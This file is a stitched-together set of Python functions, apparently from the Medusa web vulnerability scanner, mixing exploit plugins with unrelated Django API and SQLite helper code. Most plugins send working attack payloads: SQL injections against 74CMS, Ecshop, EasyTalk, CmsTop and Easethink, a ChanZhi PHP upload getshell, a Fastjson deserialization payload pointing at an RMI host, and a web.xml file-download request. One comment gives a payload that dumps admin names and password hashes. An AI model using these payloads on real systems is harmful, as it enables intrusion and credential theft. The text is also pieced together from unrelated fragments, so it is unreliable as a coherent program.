def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/plus/ajax_user.php?act=check_email"
data = "email=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),2,1))>100 as signed) %23"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.post(payload_url,
data=data,
headers=headers,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if con.find('4a8a08f09d37b73795649038408b5f33') != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
payload = '/chanzhi/admin.php?m=package&f=upload'
verify = '/chanzhi/system/tmp/package/php.php'
payload_url = url + payload
verify_url = url + verify
data = """
------WebKitFormBoundaryGgFOYWAluy1F8lvn
Content-Disposition: form-data; name="file"; filename="php.php"
Content-Type: text/php
<?php echo md5(c);>
------WebKitFormBoundaryGgFOYWAluy1F8lvn--
"""
requests.post(payload_url,
data=data,
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
resp = requests.get(verify_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在ChanZhiEPSGetShell漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/upload/admin/admin_baiduxml.php?ac=setsave'
data = "xmlmax=1111&xmlpagesize=112&sunrain'=aaa"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if con.find("Error:Query error") != -1 and con.find(
"value='aaa'") != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
url = kwargs.get("Url") #获取传入的url参数
Headers = kwargs.get("Headers") #获取传入的头文件
proxies = kwargs.get("Proxies") #获取传入的代理参数
try:
payload_url = url
DL = Dnslog()
# DL="777777777777.h3me6i.dnslog.cn"
data = '''{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://%s/Exploit",
"autoCommit": true
}
}
''' % DL.dns_host()
Headers['Content-Type'] = 'application/json'
Headers["Connection"] = "close"
resp = requests.post(payload_url,
headers=Headers,
data=data,
proxies=proxies,
timeout=10,
verify=False)
if DL.result() and resp.status_code == 400:
Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
url, payload_url, resp.text, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/index.php"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'cookie': 'sort_field_idx=1=extractvalue(1,concat(0x5c,md5(1)))',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.post(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849") != -1:
Medusa = "{}存在EasethinkCookie注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/upload/admin/admin_category.php?ac=edit_color_save'
data = "val=xx&id=1 union select md5(c),2,3,4"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(736482),3%23"
#用EXP可以获取密码和账户
EXP = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,group_concat(admin_name,0x3a,pwd,0x3a,pwd_hash),3%20fr<>om%20qs_admin%23"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if con.find('5cee14937d463a819651c8e1c504613c') != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def GenerateWord(request): #生成word文档报告
RequestLogRecord(request, request_api="generate_word")
if request.method == "POST":
try:
#传入Sid和Token来进行创建任务
Sid = json.loads(request.body)["sid"]
UserToken = json.loads(request.body)["token"]
UserName = UserInfo().QueryUserNameWithToken(
UserToken) # 如果登录成功后就来查询用户名
UserOperationLogRecord(request,
request_api="generate_word",
uid=UserName)
if UserName != None: # 查到了UID
VulnerabilityDataList, Url = MedusaQuery().QueryBySid(
sid=Sid, uid=UserName) #查询漏洞列表和URL
WordDownloadFileName = GenerateWordReport(
VulnerabilityDataList=VulnerabilityDataList,
target_url=Url)
if WordDownloadFileName != None:
ReportGenerationList().Write(
sid=Sid, uid=UserName,
file_name=WordDownloadFileName) #把相关数据写到数据库中
return JsonResponse({
'message': WordDownloadFileName,
'code': 200,
})
else:
return JsonResponse({
'message': '报告生成失败了!🐈',
'code': 404,
})
except Exception as e:
ErrorLog().Write("Web_Api_GenerateReport_GenerateWord(def)", e)
return JsonResponse({
'message': '莎酱被玩坏啦(>^ω^<)喵',
'code': 500,
})
else:
return JsonResponse({
'message': '请使用Post请求',
'code': 500,
})
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/admin/affiliate_ck.php?act=list&auid=3+and+updatexml(1,concat(0x7e,concat(md5(c),0x3a,user()),0x7e),1)"
data = "status=1&order_sn=2"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
resp = requests.post(payload_url,
headers=headers,
data=data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def DeleteProject(request): #用来删除用户的XSS项目
RequestLogRecord(request, request_api="delete_cross_site_script_project")
if request.method == "POST":
try:
UserToken = json.loads(request.body)["token"]
ProjectName = json.loads(request.body)["project_name"]
Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名
if Uid != None: # 查到了UID
UserOperationLogRecord(
request,
request_api="delete_cross_site_script_project",
uid=Uid)
Result = CrossSiteScriptProject().Delete(
uid=Uid, project_name=ProjectName) # 查询项目信息
if Result:
return JsonResponse({
'message': "删除成功~",
'code': 200,
})
else:
return JsonResponse({
'message': "项目删除失败!",
'code': 170,
})
else:
return JsonResponse({
'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧",
'code': 403,
})
except Exception as e:
ErrorLog().Write(
"Web_CrossSiteScriptHub_CrossSiteScript_DeleteProject(def)", e)
return JsonResponse({
'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)',
'code': 169,
})
else:
return JsonResponse({
'message': '请使用Post请求',
'code': 500,
})
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/plus/ajax_officebuilding.php?act=key&key=asd%錦%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def UpdateShowName(request):#更新显示名字
RequestLogRecord(request, request_api="update_show_name")
if request.method == "POST":
try:
Token=json.loads(request.body)["token"]
NewShowName= json.loads(request.body)["new_show_name"]
Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID
if Uid != None: # 查到了UID
UserOperationLogRecord(request, request_api="update_show_name", uid=Uid) # 查询到了在计入
UpdateShowNameResult=UserInfo().UpdateShowName(uid=Uid,show_name=NewShowName)#获取值查看是否成功
if UpdateShowNameResult:
return JsonResponse({'message': '好诶!修改成功~', 'code': 200, })
else:
return JsonResponse({'message': "输入信息有误重新输入", 'code': 404, })
else:
return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
except Exception as e:
ErrorLog().Write("Web_BasicFunctions_User_UpdateShowName(def)", e)
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def UpdateKey(request):#更新Key
RequestLogRecord(request, request_api="update_key")
if request.method == "POST":
try:
Token=json.loads(request.body)["token"]
NewKey= randoms().result(40)#生成随机的key,有可能会重复,这边先暂时不管了,这概论太j8低了
Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID
if Uid != None: # 查到了UID
UserOperationLogRecord(request, request_api="update_key", uid=Uid) # 查询到了在计入
UpdateKeyResult=UserInfo().UpdateKey(uid=Uid,key=NewKey)#获取值查看是否成功
if UpdateKeyResult:
return JsonResponse({'message': '呐呐呐呐!修改成功了呢~', 'code': 200, })
else:
return JsonResponse({'message': "输入信息有误重新输入", 'code': 404, })
else:
return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
except Exception as e:
ErrorLog().Write("Web_BasicFunctions_User_UpdateKey(def)", e)
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def Creation(request):#创建生成项目
RequestLogRecord(request, request_api="create_email_project")
if request.method == "POST":
try:
Token=json.loads(request.body)["token"]
Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID
if Uid != None: # 查到了UID
UserOperationLogRecord(request, request_api="create_email_project", uid=Uid) # 查询到了在计入
Key=randoms().result(10)#生成Key
Result=EmailProject().Write(uid=Uid,project_key=Key)
if Result:
return JsonResponse({'message': Key, 'code': 200, })
else:
return JsonResponse({'message': "创建失败!", 'code': 505, })
else:
return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
except Exception as e:
ErrorLog().Write("Web_Email_EmailProject_Creation(def)", e)
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def VulnerabilityDistribution(self, **kwargs):#查询时间段中,漏洞分布,通过查询medusa表来获取所有个数
Uid = kwargs.get("uid")
StartTime = kwargs.get("start_time")
EndTime = kwargs.get("end_time")
try:
#查询时间段中数据分布
self.cur.execute("select timestamp from Medusa where uid =? and timestamp<=? and timestamp>=?", (Uid,EndTime,StartTime,))
CountDict = {}
Tmp=[]
for x in self.cur.fetchall():#先对数据进行提取
Tmp.append(x[0])
for i in set(Tmp):#在对数据进行统计
CountDict[i] = Tmp.count(i)
#对数据进行排序
SortResult = sorted(CountDict.items(), key=lambda item: item[0])
return SortResult#直接返回数据
except Exception as e:
ErrorLog().Write("Web_WebClassCongregation_HomeInfo(class)_TimeDistribution(def)", e)
return None
def Query(self, **kwargs) -> bool or None: #查询该文件是否是该用户所有
Uid = kwargs.get("uid")
FileName = kwargs.get("file_name")
try:
self.cur.execute(
"select * from ReportGenerationList where file_name =? and uid=?",
(
FileName,
Uid,
))
if self.cur.fetchall(): # 判断是否有数据
self.con.close()
return True
else:
return False
except Exception as e:
ErrorLog().Write(
"Web_WebClassCongregation_ReportGenerationList(class)_QueryTokenValidity(def)",
e)
return None
def TokenAuthentication(
self, **kwargs: str
) -> bool or None: #查询用户Token是否存在,存在返回True,不存在返回False,报错返回None
Token = kwargs.get("token")
if Token != None:
try:
self.cur.execute("select * from UserInfo where token =?",
(Token, ))
if self.cur.fetchall(): # 判断是否有数据
self.con.close()
return True
else:
return False
except Exception as e:
ErrorLog().Write(
"Web_WebClassCongregation_UserInfo(class)_TokenAuthentication(def)",
e)
return None
else:
return False
def Monitor(): #用于监控系统信息
try:
MemoryInfo = psutil.virtual_memory() # 获取完整内存信息
# 内存使用率 = (物理内存大小 - 可用内存大小) / 物理内存大小 * 100
MemoryUsed = MemoryInfo.total - MemoryInfo.available # 内存已使用
MemoryFree = MemoryInfo.available # 内存空闲大小
MemoryPercent = MemoryInfo.percent # 内存使用率
CentralProcessingUnitUsageRate = psutil.cpu_percent(1) #CUP总使用率
PerCoreCentralProcessingUnitUsageRate = psutil.cpu_percent(
percpu=True) #每个CUP使用率
HardwareUsageRateInfo().Write(
memory_free=MemoryFree,
memory_percent=MemoryPercent,
memory_used=MemoryUsed,
central_processing_unit_usage_rate=CentralProcessingUnitUsageRate,
per_core_central_processing_unit_usage_rate=str(
PerCoreCentralProcessingUnitUsageRate)) #数据写到数据库中
except Exception as e:
ErrorLog().Write("Web_SystemInfo_HardwareInfo_Monitor(def)", e)
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
payload = "/?m=app&a=myapp&keyword=yu%'union select 1,2,3,4,md5(c),6,7,8,9,10,11,12,13,14,15,16,17#"
payload_url = url + payload
resp = requests.get(payload_url,headers=Headers, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1 :
Medusa = "{}存在EasyTalkSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None:
url=kwargs.get("Url")#获取传入的url参数
Headers=kwargs.get("Headers")#获取传入的头文件
proxies=kwargs.get("Proxies")#获取传入的代理参数
url=PortReplacement(url,888)
try:
payload = '/pma/'
payload_url = url + payload
resp = requests.get(payload_url,headers=Headers, proxies=proxies, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("phpMyAdmin")!=-1 and con.find("sql")!=-1 and con.find("New")!=-1:
Medusa = "{}存在宝塔面板未授权访问phpMyAdmin数据库漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n".format(url,payload_url,con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def __init__(self):
self.con = sqlite3.connect(GetDatabaseFilePath().result())
# 获取所创建数据的游标
self.cur = self.con.cursor()
# 创建表
try:
self.cur.execute("CREATE TABLE OriginalProxyData\
(rid INTEGER PRIMARY KEY,\
uid TEXT NOT NULL,\
oid TEXT NOT NULL,\
creation_time TEXT NOT NULL,\
url TEXT NOT NULL,\
request_headers TEXT NOT NULL,\
request_date TEXT NOT NULL,\
request_method TEXT NOT NULL,\
issue_task_status TEXT NOT NULL)")
except Exception as e:
ErrorLog().Write(
"Web_WebClassCongregation_OriginalProxyData(class)_init(def)",
e)
def UpdateAvatar(self,**kwargs:str)->bool:#更新用户头像路径,True表示成功,False表示各失败
Uid = kwargs.get("uid")
Avatar = kwargs.get("avatar")
UpdateTime = str(int(time.time())) # 修改时间
if Uid!=None and Avatar!=None:
try:
self.cur.execute("""UPDATE UserInfo SET avatar = ?, avatar_update_time = ? WHERE uid= ?""", (Avatar,UpdateTime,Uid,))
# 提交
if self.cur.rowcount < 1: # 用来判断是否更新成功
self.con.commit()
self.con.close()
return False
else:
self.con.commit()
self.con.close()
return True
except Exception as e:
ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateImgPath(def)", e)
return False
else:return False
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
payload = "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml"
payload_url = url + payload
resp = requests.get(payload_url, headers=Headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('log4jConfigLocation') != -1 :
Medusa = "{}存在汇思软件任意文件下载漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def UpdateKey(self,**kwargs:str)->bool:#更新用户Key,True表示成功,False表示失败
Uid = kwargs.get("uid")
Key= kwargs.get("key")
UpdateTime = str(int(time.time())) # 修改时间
if Uid!=None and Key!=None:
try:
self.cur.execute("""UPDATE UserInfo SET key = ? , key_update_time = ? WHERE uid= ?""", (Key,UpdateTime,Uid,))
# 提交
if self.cur.rowcount < 1: # 用来判断是否更新成功
self.con.commit()
self.con.close()
return False
else:
self.con.commit()
self.con.close()
return True
except Exception as e:
ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateKey(def)", e)
return False
else:return False
def medusa( **kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
payload = "/ecshop/respond.php?code=alipay&subject=0&out_trade_no=%00′ and (select * from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,md5(c)) from ecs_admin_user limit 1))a from information_schema.tables group by a)b)"
payload_url = url + payload
resp = requests.get(payload_url,headers=Headers,timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if con.find("4a8a08f09d37b73795649038408b5f33")!= -1:
Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def UpdateToken(self,**kwargs:str)->bool:#更新用户Token,True表示成功,False表示失败
Name = kwargs.get("name")
Token= kwargs.get("token")
UpdateTime = str(int(time.time())) # 修改时间
if Name!=None and Token!=None:
try:
self.cur.execute("""UPDATE UserInfo SET token = ? , token_update_time = ? WHERE name= ?""", (Token,UpdateTime,Name,))
# 提交
if self.cur.rowcount < 1: # 用来判断是否更新成功
self.con.commit()
self.con.close()
return False
else:
self.con.commit()
self.con.close()
return True
except Exception as e:
ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateToken(def)", e)
return False
else:return False
def __init__(self):
self.con = sqlite3.connect(GetDatabaseFilePath().result())
# 获取所创建数据的游标
self.cur = self.con.cursor()
# 创建表
try:
self.cur.execute("CREATE TABLE UserOperationLog\
(id INTEGER PRIMARY KEY,\
uid TEXT NOT NULL,\
request_api TEXT NOT NULL,\
creation_time TEXT NOT NULL,\
header TEXT NOT NULL,\
request_ip TEXT NOT NULL,\
request_method TEXT NOT NULL,\
request_url TEXT NOT NULL,\
post_date TEXT NOT NULL)")
except Exception as e:
ErrorLog().Write(
"Web_WebClassCongregation_UserOperationRecord(class)_init(def)",
e)
def ForgetPassword(self,**kwargs):#忘记密码函数
Name = kwargs.get("name")
NewPasswd=kwargs.get("new_passwd")
Email=kwargs.get("email")
UpdateTime = str(int(time.time())) # 修改时间
try:
self.cur.execute("""UPDATE UserInfo SET passwd = ? , passwd_update_time = ? WHERE name= ? and email=?""",
(NewPasswd, UpdateTime, Name,Email,))
# 提交
if self.cur.rowcount < 1:#用来判断是否更新成功
self.con.commit()
self.con.close()
return False
else:
self.con.commit()
self.con.close()
return True
except Exception as e:
ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_ForgetPassword(def)", e)
return False
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
payload = "/?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select md5(c) from cmstop_admin where departmentid=2 limit 0,1;#"
payload_url = url + payload
resp = requests.get(payload_url, headers=Headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if con.find('4a8a08f09d37b73795649038408b5f33') != -1 :
Medusa = "{}存在CmsTopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def Write(self,**kwargs):#写入相关信息,如果写入成功返回Sid值,如果失败返回None
CreationTime = str(int(time.time())) # 创建时间
Uid=kwargs.get("uid")
Url=kwargs.get("url")
Proxy=kwargs.get("proxy")
Status = kwargs.get("status")
Module = kwargs.get("module")
Process = kwargs.get("process")
RedisId=""#先吧RedisID传空,后面在更新RedisID
try:
self.cur.execute("INSERT INTO ActiveScanList(uid,url,creation_time,proxy,status,process,module,redis_id)\
VALUES (?,?,?,?,?,?,?,?)",(Uid,Url,CreationTime,Proxy,Status,Process,Module,RedisId,))
# 提交
GetActiveScanId=self.cur.lastrowid # 获取主键的ID值,也就是active_scan_id的值
self.con.commit()
self.con.close()
return GetActiveScanId#获取主键的ID值,也就是sid的值
except Exception as e:
ErrorLog().Write("Web_WebClassCongregation_ActiveScanList(class)_Write(def)", e)
return None
